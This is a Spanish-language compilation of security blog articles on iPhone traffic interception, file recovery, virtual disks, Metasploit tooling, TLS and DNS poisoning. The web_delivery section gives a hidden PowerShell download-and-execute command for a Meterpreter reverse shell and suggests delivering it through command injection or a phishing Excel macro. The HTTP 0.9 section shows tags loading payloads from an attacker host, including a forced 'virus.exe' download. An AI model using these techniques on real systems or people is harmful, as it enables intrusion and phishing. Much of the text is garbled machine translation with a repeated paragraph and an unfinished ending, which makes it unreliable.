Pruebas de penetracion en el dispositivo iphone sin jailbreak

Para configurar una plataforma móvil de pruebas de penetración generalmente se necesita un dispositivo jailbreak iOS. Jailbreak es un proceso de eliminación de las restricciones de hardware en dispositivo iOS para proporcionar acceso root a los archivos de sistema, incluyendo lo que permite instalar aplicaciones no confiables, los equipos y las extensiones que no están disponibles a través de la tienda oficial de aplicaciones explica experto de proveedor y empresa de seguridad informática, John Rayan.

Pero si usted no tiene un dispositivo con jailbreak o si usted no quiere hacer jailbreak a tu dispositivo iOS, aún puede realizar pruebas de penetración en el dispositivo sin jailbreak con esta guía. Por lo tanto, vamos a configurar el entorno de pruebas de penetración y experto de empresa de seguridad informática, John Rayan nos ayuda con eso.

Que necesitas –

Un dispositivo no jailbreak con ios 6 hasta ios 8.2, un sistema de Windows con algunas herramientas instaladas.

Cómo instalar aplicación de pruebas de penetración

Hay muchas herramientas como iFunbox, iTools que no necesitan dispositivos con jailbreak. Aquí, vamos a utilizar la herramienta iFunbox para la instalación de aplicaciones. Para instalar una aplicación que necesita ser probada, abierta iFunbox, haga clic en iFunbox clásico. Se mostrará la lista de todas las aplicaciones instaladas en el dispositivo. Usando estas herramientas hacen la instalación de aplicaciones y eso no ayuda en pruebas de penetración.

Como alternativa, puede instalar cualquier aplicación oficial de la App Store también.

Según experto de empresa de seguridad informática, la parte de análisis de tráfico de aplicación es idéntico para pentesting de red y pentesting web como ambas implican la interacción del cliente con los componentes de servidor en la red utilizando algún protocolo. Nuestro principal objetivo es capturar y analizar el tráfico de red y encontrar vulnerabilidades. Aplicaciones para el iPhone pueden utilizar el protocolo HTTP o HTTPS para transmitir los datos.

Muchas de las aplicaciones móviles todavía están utilizando protocolo http transmisión de texto plano, y este tipo de aplicaciones son vulnerables a los ataques MITM como un montón de gente que accede a ellos sobre Wi-Fi abierta. El análisis de tráfico se puede configurar mediante la creación de un proxy primero explica experto de empresa de seguridad informática. En su computadora (máquina de Windows), abre BURPSUITE y hacer que escuche en el puerto 8080. Seleccione las opciones “All interfaces” y selecciona ” support invisible proxying ” en las opciones de Proxy Listener.

Ahora vaya a “Configuración” – Seleccione la red Wi-Fi – Haga clic en “Manual” en la opción de proxy HTTP.

Aquí editar Servidor como su dirección IP y el puerto de computadora como 8080. Guardar los ajustes. Ahora accede a la aplicación que necesita ser probada. Observe el tráfico en Burp Suite.

Cómo capturar https – tráfico cifrado

Análisis del protocolo https es el mismo como http, pero a veces se pone un poco complicado.

En general todas las aplicaciones basadas en el navegador validan el certificado de servidor, pero por las aplicaciones nativas los desarrolladores tienen que escribir código de validación de certificados.

Durante la prueba es necesario que primero validemos si la aplicación está aceptanda los certificados no válidos o da error de certificado no válido.

Para capturar el tráfico HTTPS, hay dos opciones disponibles

Al instalar el certificado de BURP CA en la lista de certificados de confianza de iPhone y más adelante, si la aplicación recibe un certificado proxy no se mostrará ningún error de certificado porque hemos dicho a nuestro iPhone a confiar en ese certificado. Esto nos permitirá capturar el tráfico https explica experto de empresa de seguridad informática.

Utilice el mismo procedimiento como el anterior pero en lugar de burp proxy usa la herramienta de proxy fiddler y proxy fiddler más tarde navegación para eructar.

La segunda opción parece torpe pero me funciona cada vez. Aquí vamos a utilizar la segunda opción para capturar el tráfico https.

Primero necesitamos configurar fiddler y BURP en nuestro equipo (máquina de Windows). Abra la herramienta de proxy fiddler. Ir a la opción WinINET, y desactivar el proxy del sistema, de manera que el fiddler puede capturar sólo proxy remoto.

Ahora ve a – Tools – Opciones de Fiddler, y selecciona capture connect https, Allow remote computers to connect. Ahora ve a la – Gateway tab y seleccione Configuración manual del proxy. En este caso, poner de proxy manual localhost y haga que se escuche en el puerto 8080. Con la ayuda de esta configuración, el tráfico de fiddler se va a navegar por Burp Suit.

Ahora abra Burp suite y haga escuchar en el puerto 8080. Seleccione la opción All interfaces ‘ y selecciona ‘support invisible proxying’

 Para que la aplicación confíe a fiddler, sólo tenemos que instalar el certificado del fiddler en iPhone. Para extraer el certificado de fiddler, seleccione HTTPS en el menú. Haga clic en ” export root certificate to desktop ‘y luego envía ese un correo electrónico de iPhone. Esta es la forma más fácil de transferir el certificado fiddler al dispositivo explica experto de empresa de seguridad informática.

 Abra el correo electrónico que contiene el certificado y haga clic en él. El dispositivo le pedirá que instale el perfil / certificado o no. Haga clic en ‘instalar’.

Ahora, el último paso es configurar el proxy. Ir a – Configuración – Wi-Fi Seleccione su red – manual del proxy.

Aquí introducir la dirección IP de computadora y hacer que se escuche en el puerto 8888. Puerto 8888 es de fiddlers. De esta manera el tráfico https de la aplicación se navegue a Fiddler explica experto de empresa de seguridad informática y pruebas de penetración.

Según experto de empresa de seguridad informática y pruebas de penetración, podemos realizar varios ataques a través de análisis de tráfico de aplicaciones como inyección del lado del cliente, manipulación de datos, análisis de los mensajes de error, administración de sesiones, Banner grabbing y la recopilación de información, etc.

Cómo recuperar fácilmente los archivos de la tarjeta SD dañado.

Tarjeta SD puede corromperse en cualquier momento, si no se atiende. De pronto comienza a recibir un mensaje de error indicando que no puede leer desde el dispositivo al intentar copiar las imágenes, carpetas y otros contenidos. Usted encontrará archivos de nombre aleatorio lanzados en directorios diferentes. Sin embargo, ya hay muchos programas  probados que le permite recuperar sus archivos importantes de la tarjeta SD, pero la verdad son poco complicados. Según técnicos de consultoría y empresa de seguridad informática, los usuarios comunes pueden recuperar ellos mismos archivos con programas como PhotoRec. PhotoRec es un programa de recuperación de datos gratis que se ejecuta desde una interfaz de línea de comando. Inicialmente se utilizó para recuperar sólo imágenes sino usando la técnica correcta ha demostrado excelentes resultados en la recuperación de otros archivos también.

PhotoRec es un programa gratuito de recuperación de datos y puede descargarse desde el sitio web CGSecurity, una consultoría y empresa de seguridad informática. Por favor asegúrese de haber descargado la versión correcta del software que se adapte a sus requisitos de PC. PhotoRec es compatible con todos los sistemas operativos. Estrictamente debe descargar el software desde la página web original ya que hay otros programas duplicados en otros sitios web que pueden introducir malware en el ordenador.

Después de ejecutar el programa, Photorec le pedirá que seleccione el disco que desea recuperar los datos. Asegúrese de que la tarjeta SD está conectada al PC a través del lector de tarjetas, USB o móvil. Utilice las teclas de flecha para seleccionar su tarjeta en las opciones.

Después de seleccionar la tarjeta, el software le pedirá que configure las opciones y los tipos de archivos que desea recuperar. Por defecto, todos los tipos de archivo se destacan. Sin embargo, el proceso de recuperación podría hacerse realmente rápido y eficiente si limitar la búsqueda seleccionando el tipo específico del archivo de recuperación. Digamos que queremos recuperar el vídeo del teléfono móvil 3G (GSM) entonces usted debe centrarse en. 3GP.

PhotoRec solicitará el tipo de control del espacio: Free o Whole. Usted debe de optar por Whole en caso de que su tarjeta está completamente dañada. Sin embargo, si desea buscar archivos eliminados entonces puede considera opción Free explican técnicos de consultoría y empresa de seguridad informática.

 Después de esto, escoge un lugar de fácil acceso en la que desea los archivos recuperados. Asegúrese de que la ubicación se encuentra en el directorio de equipo no en la tarjeta. Utilice las teclas de flecha para seleccionar la ubicación.

 

Ahora que usted ha hecho todas las diligencias. Después de terminar el escaneo y actualización de los resultados, se puede navegar por los resultados en el directorio proporcionado.

Siguiendo estos pasos sin duda recuperará sus archivos personales importantes. Todavía, hay muchos otros programas en el mercado para esta tarea como Recuva y DataRescue3, pero estos son OS orientado explican técnicos de consultoría y empresa de seguridad informática. Sin embargo, PhotoRec no es tan llamativo o intuitiva como otros programas de recuperación, pero es una de las más poderosas soluciones de recuperación de datos gratis y funciona en prácticamente todos los sistemas operativos.

Diferentes tipos de formatos de la imagen de un disco duro virtual

Vamos a hablar sobre formatos de disco duro virtual con ayuda de expertos de un proveedor de seguridad informática. El disco duro de una máquina virtual se implementa como los archivos, que viven en su sistema de archivo nativo de la máquina host. MS Virtual PC y MS Virtual Server soportan los tipos de formatos de discos duros virtuales mencionados a continuación:

Fijo - La imagen de disco duro fijo es un archivo en particular, que se corresponde con el tamaño del disco virtual. Digamos por ejemplo, si un usuario ha creado un disco duro virtual particular de 2 GB, entonces su máquina va a crear un archivo host, que sería alrededor de 2GB. Este espacio que se asigna para los datos es entonces seguido por la estructura del pie de página. El tamaño de archivo completo es realmente el tamaño del disco duro en el host OS, añadida al tamaño del pie de página explica expertos de un proveedor de seguridad informática. Debido a la limitación del tamaño del sistema de archivos de host, este tipo de disco duro puede ser algo limitado. Por ejemplo, en algunos sistemas de archivos FAT32, el tamaño máximo de disco duro virtual es alrededor de 4 GB.

Dinámico - Este tipo de imagen en el disco duro, básicamente es un archivo dinámico, que, en cualquier momento tiene el  tamaño de los datos originales que está escrito en él, añade el tamaño del encabezado y pie de página. En un disco duro dinámico, la asignación se realiza en bloques. Como pasa el tiempo y como más datos se escribe a él, el archivo sí mismo aumenta dinámicamente su tamaño asignando bloques. Por ejemplo, el tamaño de archivo que realiza una copia de un disco duro virtual de tamaño de 2 GB es inicialmente aproximadamente 2 MB de tamaño del sistema de archivos host. Estos tipos de discos duros suelen almacenar los metadatos que se utiliza para acceder a los datos de usuario que se guarda en el disco duro. El límite superior del tamaño del disco duro dinámico, es alrededor de 2040 GB. El tamaño real está limitado por el protocolo primario de hardware del disco. Por ejemplo, los discos duros dinámicos de ATA generalmente tienen límite de tamaño de 127 GB menciona expertos de un proveedor de seguridad informática. Cada momento, cuando se añade cualquier bloque de datos, el pie de página del disco duro dinámico tiene que ser transferido a la final de ese archivo. Ahora, como el pie de página del disco duro es una parte importante y fundamental de esa imagen en el disco duro dinámico, el pie de página en el disco duro se imita como el encabezado en la parte anterior del archivo con el propósito de redundancia.

Differencing - Este tipo de imagen de disco duro muestra el estado actual de disco duro virtual como una pila de todos los bloques modificados en comparación con la imagen original. Imagen de disco duro differencing no es independiente; sino que es la que depende de otra imagen de disco duro para ser completamente funcional explica experto de un proveedor de seguridad informática. La imagen original puede ser uno cualquiera de los tres tipos de imagen mencionados, que incluye otra imagen differencing del disco duro.

En próximo artículo vamos a cubrir mas sobre los formatos y cómo funcionan ellos.

EL NUEVO MODULO MSU FINDER DE METASPLOIT PARA SOLUCIONAR VULNERABILIDADES DE WINDOWS

La prueba del parche y el análisis son partes importantes en la investigación de las vulnerabilidades y desarrollo de exploits. Uno de los motivos es que la gente que prueba esta técnica es para volver a descubrir vulnerabilidades parcheadas, o encontrar maneras de mantener un 0día vivo en caso de que la solución es insuficiente explica Jon Bush, experto de pruebas de penetración. Acuerdo con profesionales de empresa de seguridad informática el mismo proceso también se usa para encontrar el rango de versiones afectados por una vulnerabilidad, que tiende a ser útil para predecir el valor de la vulnerabilidad, mejorar la cobertura y la fiabilidad de destino.

Ir a través de parches de Microsoft no es tarea fácil, sin embargo. Podría haber cientos de avisos sobre vulnerabilidades que está trabajando, cada uno incluyendo sistemas operativos, diferentes arquitecturas, idiomas, etc explica experto de pruebas de penetración. Por supuesto, hay herramientas disponibles para el público que puede buscar y parche lo que es vulnerable, pero esto sólo son buenos para el uso regular, como la infraestructura de TI. Para fines de investigación, por lo general no queremos sólo un parche, a menudo queremos que todos (o la mayoría) que están asociados con el producto. Según profesionales de empresa de seguridad informática sorprendentemente, parece que no hay alguna buena herramienta adecuada para este tipo de tareas. Para hacer ese tipo de tarea hay una nueva herramienta llamada MSU Finder, y otro llamado extract_msu.bat para extraer parches.

MSU Finder

El objetivo principal de MSU Finder es encontrar los vínculos de descarga de parches de Microsoft. También puede usarlo para encontrar avisos de un determinado producto, en caso de que eres curioso sobre con qué frecuencia se actualiza algo. La herramienta soporta dos formas de encontrar avisos de Microsoft: El primero y el que viene por defecto es a través de Technet. En este modo, buscador de MSU comprobará contra la lista de productos predefinido de Technet, y devolver todos los que coinciden. Si nada se compara, la herramienta sólo realizar una búsqueda más genérica. El motor de búsqueda Technet le permite buscar por MSB, KB, o número de CVE.

La otra forma es de otro usar motor de búsqueda de Google para buscador de MSU con Custom Search API pueden probar eso durante auditoría de pruebas de penetración. La petición es equivalente a la siguiente búsqueda en Google:

SEARCH_QUERY site:technet.microsoft.com intitle:”Microsoft Security Bulletin” -“Microsoft Security Bulletin Summary”

 extract_msu.bat

Como su nombre lo indica, esta herramienta puede extraer parches de Microsoft, específicamente archivos MSU. Sólo se ejecuta en Windows, ya que básicamente utiliza el comando. A medida que la herramienta se ejecuta, se creará una nueva carpeta para cada MSU. Y luego, en esa nueva carpeta, hay otra subcarpeta denominada “extraído”, ahí es donde se puede encontrar el archivo (s) real del parche que quiere instalar. A continuación, puede utilizar cualquier herramienta tercio de partido para el análisis adicional.

Ambas herramientas están ahora disponibles para el Metasploit Framework. Puede utilizar MSU Finder para encontrar avisos o incluso para descargar automáticamente los parches. Después de descargar, puede utilizar extract_msu.bat para extraerlos explican expertos de webimprints, un proveedor y empresa de seguridad informática. Una vez extraídos los parches, puede buscar fácilmente los componentes reales que desea, ponerlos en un lugar, y ahora usted tiene una buena colección de versiones de lanzamiento para fines de investigación o de desarrollo.

¿Cómo utilizar evasión HTTP y malware a nivel de Firewall?

HTTP versión 0.9 fue la primera versión del protocolo HTTP, definido en 1991 pero ya utilizado antes. Simplemente consiste en una petición GET sobre el lado del cliente que se asemeja levemente solicitud de GET actual, seguido de una respuesta en el lado del servidor. Contrario HTTP 1.0 (especificado 1996) la respuesta no consiste en el encabezado de respuesta y el cuerpo de la respuesta, pero solo contiene el cuerpo según expertos de Webimprints, empresa de seguridad informática. Esto significa que no es posible definir  los tipos de datos (Content-type), compresiones (Content-Encoding) o dar la longitud del cuerpo (Content-Length), por lo que la respuesta simplemente termina con el cierre de la conexión TCP subyacente por el servidor menciona Dave Smith especialista de seguridad informática en México.

Por ejemplo, hoy HTTP 1.1 contienen cabecera y el cuerpo y verse así:

HTTP/1.1 200 ok

Content-type: application/octet-stream

Content-length: 68

alguno-malware-aquí

Mientras que con HTTP 0.9 sería sólo el cuerpo sin cabecera:

alguno-malware-aquí

Curiosamente, HTTP 0.9 respuestas a peticiones HTTP 1.1 son aceptadas por todos los principales navegadores, aunque uno no esperaría  que los servidores habla este protocolo hoy en día según experto de proveedor de seguridad informática.

Una respuesta HTTP 0.9 no parece ser la respuesta esperada de la HTTP 1.x, ya que no incluye una cabecera de respuesta. Así que uno esperaría de un firewall para bloquear esa respuesta, porque se ve como una violación del protocolo HTTP. Y ningún firewall hoy debe asumir que existe un verdadero servidor que todavía se utiliza HTTP 0.9 en la producción. Alternativamente, el firewall puede hacer un análisis de malware de la respuesta HTTP 0.9 explica experto de proveedor de seguridad informática.

Pero, sorprendentemente, la mayoría de los firewalls, simplemente pasan una respuesta HTTP/0,9 a través sin inspección adicional. Ya que no analizan estos HTTP 0.9 respuestas en busca de malware, uno pueden asumir que estos firewalls simplemente pase todo lo no entiendan.

Puesto que en el momento que se definió HTTP 0.9 fue utilizado para mostrar HTML solamente, se podría considerar que no es peligroso, ya que sólo se muestra en el navegador. Pero mediante la combinación de la vieja HTTP 0.9 con el HTML 5 moderna uno podría simplemente hacer cumplir una descarga mediante el atributo de descarga:

<a href="http://attack.com/http09-response" download="virus.exe">

Del mismo modo una respuesta HTTP 0.9 podría utilizarse como secuencia de comandos, imagen o página HTML mediante la incorporación dentro del contexto apropiado explica especialista de empresa de pruebas de penetración:

<script src="http:// attack.com /http09-response.js">

<img src="http:// attack.com /http09-response.gif">

<a href="http:// attack.com/http09-response.html"

Evasión por Firewall a nivel HTTP son peligrosas, no sólo porque el malware puede transmitirse al usuario, sino también porque a menudo no dejan huellas y así consiguen totalmente desapercibido explica especialista de empresa de pruebas de penetración. Si uno tiene una mirada en el código fuente de soluciones IDS actuales como el uso común Snort, Bro o Suricata uno puede ver que la mayoría supone que el atacante utiliza, respuestas HTTP conformación estándar común y tratará la entrada en consecuencia. Es decir tomarán las partes de la respuesta HTTP que ellos puedan entender fácilmente y por lo general ignoran en silencio el resto. Las experiencias con los productos comerciales demuestran que confían a menudo ciegamente en la capa de HTTP de una manera similar.

Modulo web delivery de Metasploit para evasión de antivirus

En este artículo vamos a echar un vistazo a un módulo de explotación de Metasploit que no recibe mucha atención. Este módulo se llama web_delivery y el módulo dispara rápidamente un servidor web que sirve payloads. El objetivo principal de este módulo es establecer rápidamente una sesión en un equipo de destino cuando el atacante tiene que escribir manualmente en el comando de sí mismo explica Jon Bush, experto de pruebas de penetración. Acuerdo con profesionales de empresa de seguridad informática, este vector de ataque no escribe en el disco por lo que es menos probable que antivirus detecta la actividad y permitirá escaladas de privilegios suministrados por Meterpreter.

Para empezar, arranca msfconsole y seleccionar el módulo web_delivery con el siguiente comando:

use exploit/multi/script/web_delivery

El comando "info" nos dará una visión general de las opciones y el uso del módulo previsto. Como se puede ver este módulo servirá payload a través de HTTP y espera por una conexión desde el blanco, por eso se llama "web_delivery". La computadora de victima debe conectar con su servidor web para que esto funcione explica experto de pruebas de penetración.

Podemos ver que hay tres opciones disponibles:

Python

PHP

PSH (PowerShell)

Estas tres opciones proporcionan una cobertura bastante sólido para la mayoría de las situaciones que es probable que encuentre. Python se ha incluido con Linux y OSX desde hace varios años, PSH se incluye con todas las versiones de Windows y PHP cubrirá al menos algunas de sus necesidades de servidor web.

Según profesionales de empresa de seguridad informática, lo primero que debe hacer es dirigirse a las opciones "SRVHOST" y "SRVPORT". Puede dejar "SRVHOST" con el valor por defecto, pero cambia "SRVPORT" a "80", ya que la mayoría de los sistemas usan ese puerto. Como he mencionado antes Jon Bush, experto de pruebas de penetración, este es un módulo de exploit para que usted consiga shell y para eso tendrá que especificar las opciones de payload también. Utilice el comando estándar para establecer payload dependiendo de su blanco. Vamos a suponer que es PSH. set PAYLOAD windows/meterpreter/reverse_https

Por último, establecer opciones "LHOST" y " LPORT " de payload como necesario.

Algo a destacar es que este módulo se ejecuta automáticamente como un servicio en segundo plano, lo que significa que el controlador se ejecuta de forma indefinida, por lo que no tiene que preocuparse por problemas de tiempo de espera en sistemas lentos, y se puede seguir utilizando frameworks para tareas adicionales mientras que espere por shell. Una vez que esté listo, puede iniciarlo con:

exploit

y usted debe obtener un comando similar al siguiente:

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://<LHOST>/b9Ezsssdf'))

Ahora, ¿cómo se pone eso a utilizar depende de su escenario y pueden probar eso durante auditoría de pruebas de penetración. Escenario 1: Inyección de comandos Así que usted tiene una vulnerabilidad de inyección de comandos en una aplicación web. Usted ya ha determinado que el servidor se ejecuta en Windows. Obviamente, usted debe crear un ejecutable de Meterpreter o puerta trasera de un exe conocido, alojar a través de HTTP o FTP, y luego aprovechar la inyección de comandos para "echo" de su script línea por línea, para bajar y ejecutar el ejecutable. O bien, puede aprovechar la inyección de comandos para ejecutar un solo comando que inicia PowerShell, descargas y ejecuta script completamente en la memoria para que el Antivirus no lo detecte, y usted tendrá su shell.

Escenario 2: Phishing Digamos que usted va hacer phishing, y para eso puede tomar un documento de Excel, pone algunos números en ella, y lo llama un informe de gastos. Crear script de VBA para ejecutar el módulo y pegarlo en una macro. Enviar este documento en correos a las personas de diferentes departamentos para que usted obtenga al menos un shell.

Este artículo se centró en el objetivo de PSH, cosas similares son posibles con los objetivos de Python y PHP explican expertos de webimprints, un proveedor y empresa de seguridad informática.

Diferencia entre La validación de dominio vs validación extendida

CA es una autoridad de certificación como DigiCert, Comodo, Symantec, GoDaddy, GlobalSign, etc. Sus certificados ya vienen equipados con el sistema operativo y el navegador (consulte / etc/ssl/certs Si estás en Linux). Los mecanismos de revocación se llaman CRL y OCSP según Webimprints, empresa de seguridad informática. Lo que te cobran sin embargo. Dependiendo del tipo de certificado los precios varían. El proceso en donde un tercero parte en que el servidor y el cliente confían para firma del certificado del servidor crea una cadena de confianza menciona Dave Smith especialista de seguridad informática en México. Con TLS, creamos cadenas de confianza utilizando la CA como tercero.

Tenga en cuenta que los datos no tendrán un cifrado más fuerte o más débil dependiendo de la cantidad que usted paga, todas las conexiones TLS usan alguna forma de AES, lo fuerte que depende de lo que el cliente y el servidor son capaces y están dispuestos a manejar según especialista de empresa de pruebas de penetración. Por ejemplo, muchos servidores se niegan a usar SSLv3 porque todo el escándalo de Poodle, algunos equipos más antiguos no son compatibles con los algoritmos de cifrado más recientes, algunos servidores no se han actualizados, y algunos clientes utilizan Internet Explorer.

CA generalmente te cobran más por los certificados que se utilizarán en varias máquinas, así que por ejemplo un certificado para * .webimprints.com costará más de uno para www.webimprints.com. Sin embargo, lo que CA realmente no es vendedor de certificados, es el vendedor de confianza explica Dave Smith especialista de seguridad informática en México. La validación de dominio vs validación extendida Hay tres niveles de certificación. La validación de dominios, Organización de validación, Validación extendida.

La validación de dominios es la forma más barata y la más básica de validación. El CA simplemente trata de asegurarse de que tiene algún tipo de control sobre el dominio que usted está tratando de obtener un certificado. Ellos toman unos minutos para validar y configuración.

Una manera común de hacer la validación de dominios es través de correo según experto de proveedor de seguridad informática. Digamos que usted quiere un certificado para webimprints.com. Después de proporcionar toda la información

necesaria a CA para generar su certificado. Usted debe elegir un correo donde se enviará un correo electrónico de confirmación y ya tendría su certificado. Otro método común consiste en revisando la base de datos WHOIS para el dominio asociado con el certificado.

Validación de Organización y Validación extendida son más caros, EV es una simple actualización sobre OV, por lo que los certificados EV son los más caros explica especialista de empresa de pruebas de penetración.

Este tipo de validaciones no sólo incluyen los controles normales de validación de dominio, también hacen varias comprobaciones para asegurarse de que la empresa que pide el certificado existe, física y legalmente. Estos controles de seguridad informática pueden ir desde llamadas telefónicas a las cartas firmadas por el director general. Debido a esto, este tipo de certificados pueden tardar varios días para salir.

Solución de autofirmado (Self Signed Certificate) y Out of Band para seguridad de datos.

Primero vamos hablar de certificado autofirmado (Self Signed Certificate) y como funciona eso con ayuda de experto de pruebas de penetración.  Un hash del certificado se hace, cifrado con la clave privada, y luego anexado al certificado para crear un nuevo certificado.   El servidor envía este nuevo certificado a los clientes que se conectan. Para verificar el certificado, el cliente descifra el hash con la clave pública del certificado, luego calcula su propio hash y los compara, si son iguales el certificado es válido explica experto de empresa de seguridad informática. A continuación, envía al servidor un mensaje cifrado con la clave pública proporcionada, si el servidor envía el mensaje no cifrado original de nuevo, a continuación, se considera autenticado. Este proceso asegura que la clave pública proporcionada corresponde a la clave privada utilizada para cifrar el hash.  El servidor tiene acceso a la clave privada. El hash cifrado creado anexado al certificado se llama una firma digital. Menciona Dave Smith especialista de seguridad informática en México que en este ejemplo, el servidor ha firmado digitalmente su propio certificado, esto se llama un certificado autofirmado(Self Signed Certificate).

 Si un atacante logra interceptar las comunicaciones o desviar el tráfico, se puede sustituir la clave pública en el certificado con su propia, vuelva a realizar la firma digital con su propia clave privada, y se manda eso  al cliente. Eso debe probar durante pruebas de penetración.

El problema es que toda la información necesaria para la verificación es proporcionada por el servidor. Es por ello que cuando se conecta a una entidad con un auto firmado certificado, navegador dará una advertencia, no poden asegurar que todo el que se está comunicando con él es quien dice ser.

Sin embargo, este tipo de certificados son realmente útiles en algunos escenarios. Pueden ser creados de forma gratuita, rápida y con poca molestia. Por lo tanto son buenos para algunas comunicaciones internas y la creación de prototipos. Sin embargo, este tipo de certificados son realmente útiles en algunos escenarios dice experto de empresa de seguridad informática. Pueden ser creados de forma gratuita, rápida y con poca molestia. Por lo tanto son buenos para algunas comunicaciones internas.

¿Cómo podemos solucionar este problema y detectar ese problema durante auditoría de pruebas de penetración? Bueno, ya que el problema es que el servidor proporciona toda la información para autenticar el certificado, ¿por qué no nos movemos un poco de esa información al cliente? 

Explica especialista de seguridad informática en México que deja que se centramos más en el cliente con una copia del certificado en una unidad USB, y almacenarlo directamente en el cliente esto se llama Out of band proceso. Ahorita, cuando el servidor envía su certificado:

 El cliente genera su propio hash del certificado y descifra el hash proporcionado con la clave pública de la copia del certificado que se proporcionó anteriormente en la unidad USB, de esta manera se asegura de que: 1. el certificado no ha cambiado, 2. quien firmo tiene la clave privada correcta.

A continuación, envía al servidor un mensaje aleatorio cifrado con la clave pública en la copia del certificado que se almacenó antes, si el servidor devuelve el mensaje sin cifrar original, consideramos que es autenticado. Si alguien intercepta o desvía la conexión, no tiene ninguna esperanza de entregar nuestro mensaje original y proporcionar un certificado válido, sin la clave privada.

Ahora bien, esta solución en realidad autentica, ya veces se utiliza para las comunicaciones internas. Sin embargo, no es muy práctico para varios casos de uso. Sería mucho trabajo tener que descargar un certificado cada vez que necesite acceder a un nuevo sitio web seguro, como un banco o eshop, o peor, esperando que alguien entregue su certificado con una unidad USB menciona experto de seguridad informática en México.

Por otra parte, usted tiene que asegurarse de que el certificado no es manipulado en el camino, que es uno de los problemas TLS debe resolver para nosotros en primer lugar. También está el problema de qué hacer cuando el certificado vence, o cómo va a revocarlo. Para resolver ese problema usamos firmas de CA (Certification Authority) que vamos a hablar en próximo artículo con ayuda de especialista de proveedor y empresa de seguridad informática.

SSL, TLS y Seguridad Informática en México

SSL (Secure Socket Layer) es un protocolo antiguo en comparación con TLS (Transport Layer Security). TLS es un protocolo para la transmisión segura de datos en gran medida basado en SSLv según Webimprints, empresa de seguridad informática en México. TLS ofrece la confidencialidad, la integridad y autenticación. Eso significa que:

Confidencialidad: oculta el contenido de los mensajes

Integridad: detecta cuando han sido alterados

Autenticación: asegura que quien está enviándolos es quien dice ser.

Además detecta los mensajes que faltan y duplicados. TLS es la principal manera de proteger el tráfico web, y utiliza sobre todo para ese propósito menciona Dave Smith especialista de seguridad informática en México. Un montón de páginas confían en TLS y TLS es seguro, es por eso que cosas como POODLE y Heartbleed reciben tanta atención. SSL está roto, las tres versiones. El último de ellos, la versión 3, tuvo su confidencialidad gravemente comprometida por POODLE según especialista de empresa de pruebas de penetración.

Por confidencialidad TLS utiliza cualquiera de Diffie-Hellman o RSA para el intercambio de claves. Con todo el problema Heartbleed, ahora se recomienda el uso de un mecanismo de intercambio de claves con el secreto hacia adelante, lo que implica Diffie-Hellman en este caso. El cifrado real se hace normalmente usa un algoritmo AES con varios modos disponibles (CBC, CCM, GCM).

Para la integridad normalmente se utiliza HMAC, hoy es prácticamente obligatorio el uso SHA256 mencionó experto de proveedor de seguridad informática en México.

Así que sin autenticación que sería abierto a, por ejemplo, MitM (Hombre en el Medio) ataques. Pero ¿cómo se puede autenticar a un servidor si usted nunca ha visto antes, y mucho menos intercambiado ninguna credencial con él?

La respuesta es los certificados TLS. Los certificados son sólo una clave pública con un montón de información que se le atribuye, como el FQDN está autenticado, un correo electrónico de contacto, el "expedido en" y "expira en" fechas, entre otras cosas, eso puede detectar durante pruebas de penetración. El servidor almacena y mantiene en secreto la correspondiente clave privada. TLS utiliza estas teclas para autenticar el servidor al cliente.

Recordemos que en la criptografía de clave pública, los mensajes cifrados con la clave pública sólo pueden ser descifrados utilizando la clave privada, pero los mensajes cifrados con la clave privada se pueden descifrar con cualquiera, explica experto de

Webimprints, una empresa de seguridad informática en México. El propietario de las claves guarda el secreto clave privada, y distribuye libremente la clave pública.

Ahora, la forma habitual de autenticación de alguien usando criptografía de clave pública es la siguiente (Suponga que Bob quiere autenticar Alice):

Bob envía Alice un mensaje aleatorio cifrado con la clave pública de Alice

Alice descifra el mensaje utilizando su clave privada y lo envía de vuelta a Bob

Bob compara el mensaje de Alice contra el que se envía.

Si coinciden Alice es quien decir que ella es, porque sólo ella podría haber descifrado el mensaje, porque sólo ella tiene su clave privada. TLS utiliza una variación de esta técnica, pero es esencialmente el mismo.

Solución para Envenenamiento de DNS

Un ataque de envenenamiento de DNS, también llamada DNS spoofing o DNS pharming, es cuando un hacker es capaz de redirigir un usuario de Internet a un sitio web diferente a la dirección que el usuario ha escrito en su / su navegador que podemos detectar durante pruebas de penetración. Para tomar un ejemplo real, cuando un usuario escribe en www.google.ro en el navegador, se les redirige a otro sitio en lugar del motor de búsqueda de Google - un sitio web que está controlado por el hacker. Eso se paso hace 2 años según Webimprints, empresa de seguridad informática en México.

El hacker aprovecha una vulnerabilidad en el software de servidor DNS local en Rumania. Esto significa que un usuario en Rumania va a terminar en el sitio web del hacker, mientras que un usuario en, por ejemplo California no se ve afectada menciona Dave Smith especialista de seguridad informática en México.

Como las palabras son más memorables que las direcciones IP, utilizamos los nombres de dominio en lugar de números largos para acceder a un sitio web. Los números largos (direcciones IP) es la forma en que las máquinas se comunican entre sí. El Sistema de Nombres de Dominio (DNS) "conversos" nombres de dominio a su dirección IP correspondiente y viceversa según especialista de empresa de pruebas de penetración.

El sistema de nombres de dominio maneja miles de millones de solicitudes todos los días cuando la gente busca en Internet y correo electrónico entre sí. Un ataque de Envenenamiento DNS es cuando el hacker ataque los servidores DNS externos. Con el fin de acelerar el tiempo de carga de los sitios web globales utilizan las soluciones de DNS locales con resultados de caché, por lo que las solicitudes no van a la Internet cada vez que los servidores de nombres con autoridad (DNS global). Si la solicitud no está en el DNS local, entonces se envía a los servidores de nombres autorizados (DNS mundial). El hacker es, básicamente, inunda el DNS local con respuestas falsas que se cree que envíe desde el DNS global mencionó experto de empresa de seguridad informática en México.

Debido a la vulnerabilidad del servidor DNS, será erróneamente autenticar estas respuestas falsas, y esta caché se guarda en el DNS local. Cuando los usuarios a continuación, buscan el sitio web que ha sido hackeado, a continuación, se les redirige a la página web del hacker, que ahora es la respuesta en caché. En el caso de la .ro dominios el hacker había instalado el servidor falso en Holanda, e hizo que el servidor DNS local identifica la transferencia de zona como auténtico.

Como un negocio, usted quiere asegurarse de que su nombre de dominio no es secuestrado. Como usuario privado internet desea evitar ser víctima de una estafa. DNSSEC (DNS Security Extensions) está diseñado como la solución para prevenir el envenenamiento de caché DNS entre el local y los servidores de nombres autorizados

(DNS mundial). Esto se hace digitalmente "firma" de datos para que pueda estar seguro de que es válido. Webimprints, una empresa de seguridad informática en México ofrece soluciones para proteger de envenenamiento de DNS.

Client-Side Injected Malware en navegadoras

